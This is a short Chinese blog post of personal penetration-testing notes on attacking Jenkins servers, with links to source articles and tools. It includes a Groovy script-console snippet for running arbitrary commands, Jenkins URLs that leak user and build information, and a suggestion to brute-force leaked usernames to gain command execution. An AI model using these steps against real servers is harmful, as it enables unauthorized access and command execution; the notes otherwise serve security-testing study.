今天mickey牛发来一篇关于hacking Jenkins的文章,受益匪浅,虽然不是很高深的东西,看完几篇相关文章之后记录下要点,为以后做安全测试留下笔记。 文章链接: http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins. html http://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html https://www.pentestgeek.com/2014/06/13/hacking-jenkins-servers-with-no-password/ 工具链接: https://wiki.jenkins-ci.org/display/JENKINS/Terminal+Plugin https://github.com/samratashok/nishang http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_script_console https://wiki.skullsecurity.org/Passwords 文章要点: 看了几篇文章说道了一下几个东西: 1.通过自带的groovy script的解析器可以执行命令 1 2 3 4 5 def sout = new StringBuffer(), serr = new StringBuffer() def proc = '[INSERT COMMAND]'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr" 2.使用强大的powershell脚本,nishang是一个powershell脚本集 3.当我们没有办法进入console script界面执行脚本的时候可以采用以下方法 a.Jenkins的一下目录泄漏了一写开发用户信息 List of users: http://[jenkinsurl]/asynchPeople/ List of all builds: http://[jenkinsurl]/view/All/builds (Seems to be fixed in the latest version 1.575) List publilcy available content: http://[jenkinsurl]/userContent/ Type of the Operating System: http://[jenkinsurl]/computer/ b.通过泄漏的用户名爆破得到一些有build job权限的用户,然后执行相关命令 |
-
上一篇: YY网站的一个xss跨站漏洞 - 网站安全 - 自学php
下一篇: 利用OAuth劫持用户身份 - 网站安全 - 自学php
还没有人抢沙发呢~